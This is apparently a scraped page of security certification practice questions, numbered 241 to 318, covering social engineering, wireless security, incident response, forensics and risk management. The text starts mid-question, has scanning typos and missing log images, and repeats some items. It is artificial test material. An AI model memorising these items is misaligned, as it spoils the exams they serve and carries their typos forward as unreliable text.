Apply a patch to the domain controller.

C.

Research the CVE.

D.

Document this as a false positive.

Question 241

Which of the following does an air-gapped system provide?

Options:

A.

Security through physical disconnection

B.

Security through obscurity

C.

Users with mobility

D.

Security through logical isolation

Question 242

An employee finds a USB flash drive labeled "Salary Info" in an office parking lot. The employee picks up the USB flash drive, goes into the office, and plugs it into a laptop. Later, a technician inspects the laptop and realizes it has been compromised by malware. Which of the following types of social engineering attacks has occurred?

Options:

A.

Smishing

B.

Baiting

C.

Tailgating

D.

Pretexting

Question 243

A financial analyst is expecting an email containing sensitive information from a client. When the email arrives, the analyst receives an error and is unable to open the encrypted message. Which of the following is the most likely cause of the issue?

Options:

A.

The S'MIME plug-m is not enabled.

B.

The SSL certificate has expired.

C.

Secure I MAP was not implemented.

D.

P0P3S is not supported.

Question 244

A software company adopted the following processes before releasing software to production

• Peer review

• Static code scanning

• Signing

A considerable number of vulnerabilities are still being detected when code is executed on production Which of the following security tools can improve vulnerability detection on this environment?

Options:

A.

File integrity monitoring for the source code

B.

Dynamic code analysis tool

C.

Encrypted code repository

D.

Endpoint detection and response solution

Question 245

A user is attempting to navigate to a website from inside the company network using a desktop. When the user types in the URL, https://www.site.com, the user is presented with a certificate mismatch warning from the browser. The user does not receive a warning when visiting http://www.anothersite.com. Which of the following BEST describes this attack?

Options:

A.

On-path

B.

Domain hijacking

C.

DNS poisoning

D.

Evil twin

Question 246

A company's legal department drafted sensitive documents in a SaaS application and wants to ensure the documents cannot be accessed by individuals in high-risk countries. Which of the following is the most effective way to limit this access?

Options:

A.

Data masking

B.

Encryption

C.

Geolocation policy

D.

Data sovereignty regulation

Question 247

An organization relies on third-party videoconferencing to conduct daily business. Recent security changes now require all remote workers to utilize a VPN to corporate resources Which of the following would best maintain high-quality videoconferencing while minimizing latency when connected to the VPN?

Options:

A.

Using geographic diversity lo have VPN terminators closer to end users

B.

Utilizing split tunneling so only traffic for corporate resources is encrypted

C.

Purchasing higher bandwidth connections to meet the increased demand

D.

Configuring OoS properly on the VPN accelerators

Question 248

An endpoint protection application contains critical elements that are used to protect a system from infection. Which of the following must be updated before completing a weekly endpoint check?

Options:

A.

Policy engine

B.

Policy updates

C.

Policy definitions

D.

Policy signatures

Question 249

Which of the following types of data are most likely to be subject to regulations and laws? (Select two).

Options:

A.

PHI

B.

Trade secrets

C.

Proprietary

D.

OSINT

E.

Pll

F.

Public

Question 250

Which of the following teams combines both offensive and defensive testing techniques to protect an organization's critical systems?

Options:

A.

Red

B.

Blue

C.

Purple

D.

Yellow

Question 251

A security analyst it investigating an incident to determine what an attacker was able to do on a compromised Laptop. The analyst reviews the following SIEM log:

Question # 251

Which of the following describes the method that was used to compromise the laptop?

Options:

A.

An attacker was able to move laterally from PC 1 to PC2 using a pass-the-hash attach

B.

An attacker was able to bypass the application approve list by emailing a spreadsheet. attachment with an embedded PowerShell in the file.

C.

An attacker was able to install malware to the CAasdf234 folder and use it to gain administrator rights and launch Outlook

D.

An attacker was able to phish user credentials successfully from an Outlook user profile

Question 252

An organization's Chief Security Officer (CSO) wants to validate the business's involvement in the incident response plan to ensure its validity and thoroughness. Which of the following will the CSO most likely use?

Options:

A.

An external security assessment

B.

A bug bounty program

C.

A tabletop exercise

D.

A red-team engagement

Question 253

Which of the following test describes the risk that is present once mitigations are applied?

Options:

A.

Control risk

B.

Residual risk

C.

Inherent risk

D.

Risk awareness

Question 254

A worldwide manufacturing company has been experiencing email account compromises. In one incident, a user logged in from the corporate office in France, but then seconds later, the same user account attempted a login from Brazil. Which of the following account policies would best prevent this type of attack?

Options:

A.

Network location

B.

Impossible travel time

C.

Geolocation

D.

Geofencing

Question 255

A systems administrator is creating a script that would save time and prevent human error when performing account creation for a large number of end users. Which of the following would be a good use case for this task?

Options:

A.

Off-the-shelf software

B.

Orchestration

C.

Baseline

D.

Policy enforcement

Question 256

A security engineer needs to recommend a solution to defend against malicious actors misusing protocols and being allowed through network defenses. Which of the following will the engineer most likely recommended?

Options:

A.

A content filter

B.

AWAF

C.

A next-generation firewall

D.

An IDS

Question 257

A security analyst has been tasked with creating a new WiFi network for the company. The requirements received by the analyst are as follows:

•Must be able to differentiate between users connected to WiFi

•The encryption keys need to change routinely without interrupting the users or forcing reauthentication

•Must be able to integrate with RADIUS

•Must not have any open SSIDs

Which of the following options BEST accommodates these requirements?

Options:

A.

WPA2-Enterprise

B.

WPA3-PSK

C.

802.11n

D.

WPS

Question 258

Which of the following would MOST likely be identified by a credentialed scan but would be missed by an uncredentialed scan?

Options:

A.

Vulnerabilities with a CVSS score greater than 6.9.

B.

Critical infrastructure vulnerabilities on non-IP protocols.

C.

CVEs related to non-Microsoft systems such as printers and switches.

D.

Missing patches for third-party software on Windows workstations and servers.

Question 259

A security architect is implementing a new email architecture for a company. Due to security concerns, the Chief Information Security Officer would like the new architecture to support email encryption, as well as provide for digital signatures. Which of the following should the architect implement?

Options:

A.

TOP

B.

IMAP

C.

HTTPS

D.

S/MIME

Question 260

Which of the following environments would MOST likely be used to assess the execution of component parts of a system at both the hardware and software levels and to measure performance characteristics?

Options:

A.

Test

B.

Staging

C.

Development

D.

Production

Question 261

Which of the following function as preventive, detective, and deterrent controls to reduce the risk of physical theft? (Select TWO).

Options:

A.

Mantraps

B.

Security guards

C.

Video surveillance

D.

Fences

E.

Bollards

F.

Antivirus

Question 262

The Chief Information Security Officer wants to pilot a new adaptive, user-based authentication method. The concept Includes granting logical access based on physical location and proximity. Which of the following Is the BEST solution for the pilot?

Options:

A.

Geofencing

B.

Self-sovereign identification

C.

PKl certificates

D.

SSO

Question 263

An organization is concerned about hackers potentially entering a facility and plugging in a remotely accessible Kali Linux box. Which of the following should be the first lines of defense against such an attack? (Select TWO)

Options:

A.

MAC filtering

B.

Zero trust segmentation

C.

Network access control

D.

Access control vestibules

E.

Guards

F.

Bollards

Question 264

A security engineer is reviewing the logs from a SAML application that is configured to use MFA, during this review the engineer notices a high volume of successful logins that did not require MFA from users who were traveling internationally. The application, which can be accessed without a VPB, has a policy that allows time-based tokens to be generated. Users who changed locations should be required to reauthenticate but have been Which of the following statements BEST explains the issue?

Options:

A.

OpenID is mandatory to make the MFA requirements work

B.

An incorrect browser has been detected by the SAML application

C.

The access device has a trusted certificate installed that is overwriting the session token

D.

The user’s IP address is changing between logins, bur the application is not invalidating the token

Question 265

A global company is experiencing unauthorized logging due to credential theft and account lockouts caused by brute-force attacks. The company is considering implementing a third-party identity provider to help mitigate these attacks. Which of the following would be the BEST control for the company to require from prospective vendors?

Options:

A.

IP restrictions

B.

Multifactor authentication

C.

A banned password list

D.

A complex password policy

Question 266

A client sent several inquiries to a project manager about the delinquent delivery status of some critical reports. The project manager claimed the reports were previously sent via email, but then quickly generated and backdated the reports before submitting them as plain text within the body of a new email message thread. Which of the following actions MOST likely supports an investigation for fraudulent submission?

Options:

A.

Establish chain of custody.

B.

Inspect the file metadata.

C.

Reference the data retention policy.

D.

Review the email event logs

Question 267

A company installed several crosscut shredders as part of increased information security practices targeting data leakage risks. Which of the following will this practice reduce?

Options:

A.

Dumpster diving

B.

Shoulder surfing

C.

Information elicitation

D.

Credential harvesting

Question 268

An employee received multiple messages on a mobile device. The messages instructing the employee to pair the device to an unknown device. Which of the following BEST describes What a malicious person might be doing to cause this issue to occur?

Options:

A.

Jamming

B.

Bluesnarfing

C.

Evil twin

D.

Rogue access point

Question 269

As part of annual audit requirements, the security team performed a review of exceptions to the company policy that allows specific users the ability to use USB storage devices on their laptops The review yielded the following results.

• The exception process and policy have been correctly followed by the majority of users

• A small number of users did not create tickets for the requests but were granted access

• All access had been approved by supervisors.

• Valid requests for the access sporadically occurred across multiple departments.

• Access, in most cases, had not been removed when it was no longer needed

Which of the following should the company do to ensure that appropriate access is not disrupted but unneeded access is removed in a reasonable time frame?

Options:

A.

Create an automated, monthly attestation process that removes access if an employee's supervisor denies the approval

B.

Remove access for all employees and only allow new access to be granted if the employee's supervisor approves the request

C.

Perform a quarterly audit of all user accounts that have been granted access and verify the exceptions with the management team

D.

Implement a ticketing system that tracks each request and generates reports listing which employees actively use USB storage devices

Question 270

A company is concerned about individuals dnvmg a car into the building to gam access Which of the following security controls would work BEST to prevent this from happening?

Options:

A.

Bollard

B.

Camera

C.

Alarms

D.

Signage

E.

Access control vestibule

Question 271

After gaining access to a dual-homed (i.e.. wired and wireless) multifunction device by exploiting a vulnerability in the device's firmware, a penetration tester then gains shell access on another networked asset This technique is an example of:

Options:

A.

privilege escalation

B.

footprinting

C.

persistence

D.

pivoting.

Question 272

An attacker replaces a digitally signed document with another version that goes unnoticed Upon reviewing the document's contents the author notices some additional verbiage that was not originally in the document but cannot validate an integrity issue. Which of the following attacks was used?

Options:

A.

Cryptomalware

B.

Hash substitution

C.

Collision

D.

Phishing

Question 273

A network analyst is investigating compromised corporate information. The analyst leads to a theory that network traffic was intercepted before being transmitted to the internet. The following output was captured on an internal host:

Question # 273

Based on the IoCS, which of the following was the MOST likely attack used to compromise the network communication?

Options:

A.

Denial of service

B.

ARP poisoning

C.

Command injection

D.

MAC flooding

Question 274

A security analyst is reviewing the vulnerability scan report for a web server following an incident. The vulnerability that was used to exploit the server is present in historical vulnerability scan reports, and a patch is available for the vulnerability. Which of the following is the MOST likely cause?

Options:

A.

Security patches were uninstalled due to user impact.

B.

An adversary altered the vulnerability scan reports

C.

A zero-day vulnerability was used to exploit the web server

D.

The scan reported a false negative for the vulnerability

Question 275

Which of the following environments typically hosts the current version configurations and code, compares user-story responses and workflow, and uses a modified version of actual data for testing?

Options:

A.

Development

B.

Staging

C.

Production

D.

Test

Question 276

An organization is moving away from the use of client-side and server-side certificates for EAR The company would like for the new EAP solution to have the ability to detect rogue access points. Which of the following would accomplish these requirements?

Options:

A.

PEAP

B.

EAP-FAST

C.

EAP-TLS

D.

EAP-TTLS

Question 277

A cybersecurity administrator needs to allow mobile BYOD devices to access network resources. As the devices are not enrolled to the domain and do not have policies applied to them, which of the following are best practices for authentication and infrastructure security? (Select TWO).

Options:

A.

Create a new network for the mobile devices and block the communication to the internal network and servers

B.

Use a captive portal for user authentication.

C.

Authenticate users using OAuth for more resiliency

D.

Implement SSO and allow communication to the internal network

E.

Use the existing network and allow communication to the internal network and servers.

F.

Use a new and updated RADIUS server to maintain the best solution

Question 278

After segmenting the network, the network manager wants to control the traffic between the segments. Which of the following should the manager use to control the network traffic?

Options:

A.

A DMZ

B.

A VPN a

C.

A VLAN

D.

An ACL

Question 279

The Chief Technology Officer of a local college would like visitors to utilize the school's WiFi but must be able to associate potential malicious activity to a specific person. Which of the following would BEST allow this objective to be met?

Options:

A.

Requiring all new, on-site visitors to configure their devices to use WPS

B.

Implementing a new SSID for every event hosted by the college that has visitors

C.

Creating a unique PSK for every visitor when they arrive at the reception area

D.

Deploying a captive portal to capture visitors' MAC addresses and names

Question 280

During an incident, a company's CIRT determines it is necessary to observe the continued network-based transactions between a callback domain and the malware running on an enterprise PC. Which

of the following techniques would be BEST to enable this activity while reducing the nsk of lateral spread and the risk that the adversary would notice any changes?

Options:

A.

Physically move the PC to a separate Internet point of presence.

B.

Create and apply microsegmentation rules,

C.

Emulate the malware in a heavily monitored DMZ segment

D.

Apply network blacklisting rules for the adversary domain

Question 281

An organization discovered a disgruntled employee exfiltrated a large amount of PII data by uploading files Which of the following controls should the organization consider to mitigate this risk?

Options:

A.

EDR

B.

Firewall

C.

HIPS

D.

DLP

Question 282

Ann, a customer, received a notification from her mortgage company stating her PII may be shared with partners, affiliates, and associates to maintain day-to-day business operations.

Which of the following documents did Ann receive?

Options:

A.

An annual privacy notice

B.

A non-disclosure agreement

C.

A privileged-user agreement

D.

A memorandum of understanding

Question 283

The SIEM at an organization has detected suspicious traffic coming a workstation in its internal network. An analyst in the SOC the workstation and discovers malware that is associated with a botnet is installed on the device A review of the logs on the workstation reveals that the privileges of the local account were escalated to a local administrator. To which of the following groups should the analyst report this real-world event?

Options:

A.

The NOC team

B.

The vulnerability management team

C.

The CIRT

D.

The read team

Question 284

A business is looking for a cloud service provider that offers a la carte services, including cloud backups, VM elasticity, and secure networking. Which of the following cloud service provider types should business engage?

Options:

A.

A laaS

B.

PaaS

C.

XaaS

D.

SaaS

Question 285

A security team suspects that the cause of recent power consumption overloads is the unauthorized use of empty power outlets in the network rack Which of the following options will mitigate this issue without compromising the number of outlets available?

Options:

A.

Adding a new UPS dedicated to the rack

B.

Installing a managed PDU

C.

Using only a dual power supplies unit

D.

Increasing power generator capacity

Question 286

A security analyst needs an overview of vulnerabilities for a host on the network. Which of the following is the BEST type of scan for the analyst to run to discover which vulnerable services are running?

Options:

A.

Non-credentialed

B.

Web application

C.

Privileged

D.

Internal

Question 287

Remote workers in an organization use company-provided laptops with locally installed applications and locally stored data Users can store data on a remote server using an encrypted connection. The organization discovered data stored on a laptop had been made available to the public Which of the following security solutions would mitigate the risk of future data disclosures?

Options:

A.

FDE

B.

TPM

C.

HIDS

D.

VPN

Question 288

A desktop support technician recently installed a new document-scanning software program on a computer. However, when the end user tried to launch the program, it did not respond. Which of the following is MOST likely the cause?

Options:

A.

A new firewall rule is needed to access the application.

B.

The system was quarantined for missing software updates.

C.

The software was not added to the application whitelist.

D.

The system was isolated from the network due to infected software

Question 289

A security analyst must enforce policies to harden an MDM infrastructure. The requirements are as follows:

* Ensure mobile devices can be tracked and wiped.

* Confirm mobile devices are encrypted.

Which of the following should the analyst enable on all the devices to meet these requirements?

Options:

A.

A Geofencing

B.

Biometric authentication

C.

Geolocation

D.

Geotagging

Question 290

A new vulnerability in the SMB protocol on the Windows systems was recently discovered, but no patches are currently available to resolve the issue. The security administrator is concerned tf servers in the company's DMZ will be vulnerable to external attack; however, the administrator cannot disable the service on the servers, as SMB is used by a number of internal systems and applications on the LAN. Which of the following TCP ports should be blocked for all external inbound connections to the DMZ as a workaround to protect the servers? (Select TWO).

Options:

A.

135

B.

139

C.

143

D.

161

E.

443

F.

445

Question 291

An enterprise has hired an outside security firm to facilitate penetration testing on its network and applications. The firm has agreed to pay for each vulnerability that ts discovered. Which of the following BEST represents the type of testing that is being used?

Options:

A.

White-box

B.

Red-leam

C.

Bug bounty

D.

Gray-box

E.

Black-box

Question 292

Which of the following would be BEST for a technician to review to determine the total risk an organization can bear when assessing a "cloud-first" adoption strategy?

Options:

A.

Risk matrix

B.

Risk tolerance

C.

Risk register

D.

Risk appetite

Question 293

A company recently experienced an attack during which 5 main website was directed to the atack-er’s web server, allowing the attacker to harvest credentials from unsuspecting customers. Which of the following should the company Implement to prevent this type of attack from occurring in the future?

Options:

A.

IPSec

B.

SSL/TLS

C.

DNSSEC

D.

S/MIME

Question 294

After a WiFi scan of a local office was conducted, an unknown wireless signal was identified Upon investigation, an unknown Raspberry Pi device was found connected to an Ethernet port using a single connection. Which of the following BEST describes the purpose of this device?

Options:

A.

loT sensor

B.

Evil twin

C.

Rogue access point

D.

On-path attack

Question 295

A security analyst reports a company policy violation in a case in which a large amount of sensitive data is being downloaded after hours from various mobile devices to an external site. Upon further investigation, the analyst notices that successful login attempts are being conducted with impossible travel times during the same time periods when the unauthorized downloads are occurring. The analyst also discovers a couple of WAPs are using the same SSID, but they have non-standard DHCP configurations and an overlapping channel. Which of the following attacks is being conducted?

Options:

A.

Evil twin

B.

Jamming

C.

DNS poisoning

D.

Bluesnarfing

E.

DDoS

Question 296

The Chief Information Security Officer directed a risk reduction in shadow IT and created a policy requiring all unsanctioned high-risk SaaS applications to be blocked from user access Which of the following is the BEST security solution to reduce this risk?

Options:

A.

CASB

B.

VPN concentrator

C.

MFA

D.

VPC endpoint

Question 297

Which of the following environments can be stood up in a short period of time, utilizes either dummy data or actual data, and is used to demonstrate and model system capabilities and functionality for a fixed, agreed-upon

duration of time?

Options:

A.

PoC

B.

Production

C.

Test

D.

Development

Question 298

The security team received a report of copyright infringement from the IP space of the corporate network. The report provided a precise time stamp for the incident as well as the name of the copyrighted files. The analyst has been tasked with determining the infringing source machine and instructed to implement measures to prevent such incidents from occurring again. Which of the following is MOST capable of accomplishing both tasks?

Options:

A.

HIDS

B.

Allow list

C.

TPM

D.

NGFW

Question 299

A security administrator has discovered that workstations on the LAN are becoming infected with malware. The cause of the infections appears to be users receiving phishing emails that are bypassing the current email-filtering technology. As a result, users are being tricked into clicking on malicious URLs, as no internal controls currently exist in the environment to evaluate their safety. Which of the following would be BEST to implement to address the issue?

Options:

A.

Forward proxy

B.

HIDS

C.

Awareness training

D.

A jump server

E.

IPS

Question 300

A company recently experienced an attack during which its main website was Directed to the attacker's web server, allowing the attacker to harvest credentials from unsuspecting customers, Which of the following should the

company implement to prevent this type of attack from occurring In the future?

Options:

A.

IPsec

B.

SSL/TLS

C.

ONSSEC

D.

SMIME

Question 301

During an investigation, the incident response team discovers that multiple administrator accounts were suspected of being compromised. The host audit logs indicate a repeated brute-force attack on a single administrator account followed by suspicious logins from unfamiliar geographic locations. Which of the following data sources would be BEST to use to assess the accounts impacted by this attack?

Options:

A.

User behavior analytics

B.

Dump files

C.

Bandwidth monitors

D.

Protocol analyzer output

Question 302

Which of the following in a forensic investigation should be priorities based on the order of volatility? (Select TWO).

Options:

A.

Page files

B.

Event logs

C.

RAM

D.

Cache

E.

Stored files

F.

HDD

Question 303

During a forensic investigation, a security analyst discovered that the following command was run on a compromised host:

Question # 303

Which of the following attacks occurred?

Options:

A.

Buffer overflow

B.

Pass the hash

C.

SQL injection

D.

Replay attack

Question 304

Which of the following disaster recovery tests is the LEAST time consuming for the disaster recovery team?

Options:

A.

Tabletop

B.

Parallel

C.

Full interruption

D.

Simulation

Question 305

A security administrator is working on a solution to protect passwords stored in a database against rainbow table attacks Which of the following should the administrator consider?

Options:

A.

Hashing

B.

Salting

C.

Lightweight cryptography

D.

Steganography

Question 306

A company would like to set up a secure way to transfer data between users via their mobile phones The company's top pnonty is utilizing technology that requires users to be in as close proximity as possible to each other. Which of the following connection methods would BEST fulfill this need?

Options:

A.

Cellular

B.

NFC

C.

Wi-Fi

D.

Bluetooth

Question 307

Which of the following is a physical security control that ensures only the authorized user is present when gaining access to a secured area?

Options:

A.

A biometric scanner

B.

A smart card reader

C.

APKItoken

D.

A PIN pad

Question 308

During an incident a company CIRT determine it is necessary to observe the continued network-based transaction between a callback domain and the malware running on an enterprise PC. Which of the following techniques would be BEST to enable this activity while reducing the risk of lateral spread and the risk that the adversary would notice any changes?

Options:

A.

Physical move the PC to a separate internet pint of presence

B.

Create and apply micro segmentation rules.

C.

Emulate the malware in a heavily monitored DM Z segment.

D.

Apply network blacklisting rules for the adversary domain

Question 309

The Chief information Security Officer has directed the security and networking team to retire the use of shared passwords on routers and switches. Which of the following choices BEST meets the requirements?

Options:

A.

SAML

B.

TACACS+

C.

Password vaults

D.

OAuth

Question 310

A security analyst notices several attacks are being blocked by the NIPS but does not see anything on the boundary firewall logs. The attack seems to have been thwarted Which of the following resiliency techniques was applied to the network to prevent this attack?

Options:

A.

NIC Teaming

B.

Port mirroring

C.

Defense in depth

D.

High availability

E.

Geographic dispersal

Question 311

A security engineer is hardening existing solutions to reduce application vulnerabilities. Which of the following solutions should the engineer implement FIRST? (Select TWO)

Options:

A.

Auto-update

B.

HTTP headers

C.

Secure cookies

D.

Third-party updates

E.

Full disk encryption

F.

Sandboxing

G.

Hardware encryption

Question 312

A systems engineer is building a new system for production. Which of the following is the FINAL step to be performed prior to promoting to production?

Options:

A.

Disable unneeded services.

B.

Install the latest security patches.

C.

Run a vulnerability scan.

D.

Encrypt all disks.

Question 313

During a security assessment, a security finds a file with overly permissive permissions. Which of the following tools will allow the analyst to reduce the permission for the existing users and groups and remove the set-user-ID from the file?

Options:

A.

1s

B.

chflags

C.

chmod

D.

lsof

E.

setuid

Question 314

Hackers recently attacked a company's network and obtained several unfavorable pictures from the Chief Executive Officer's workstation. The hackers are threatening to send the images to the press if a ransom is not paid. Which of the following is impacted the MOST?

Options:

A.

Identify theft

B.

Data loss

C.

Data exfiltration

D.

Reputation

Question 315

The following are the logs of a successful attack.

Question # 315

Which of the following controls would be BEST to use to prevent such a breach in the future?

Options:

A.

Password history

B.

Account expiration

C.

Password complexity

D.

Account lockout

Question 316

An analyst is working on an email security incident in which the target opened an attachment containing a worm. The analyst wants to implement mitigation techniques to prevent further spread. Which of the following is the BEST course of action for the analyst to take?

Options:

A.

Apply a DLP solution.

B.

Implement network segmentation

C.

Utilize email content filtering,

D.

isolate the infected attachment.

Question 317

A Chief Information Officer is concerned about employees using company-issued laptops to steal data when accessing network shares. Which of the following should the company implement?

Options:

A.

DLP

B.

CASB

C.

HIDS

D.

EDR

E.

UEFI

Question 318

A security researcher has alerted an organization that its sensitive user data was found for sale on a website. Which of the following should the organization use to inform the affected parties?

Options:

A.

An incident response plan

B.

A communications plan

C.

A business continuity plan

D.

A disaster recovery plan

Page: 1 / 106
Total 1063 questions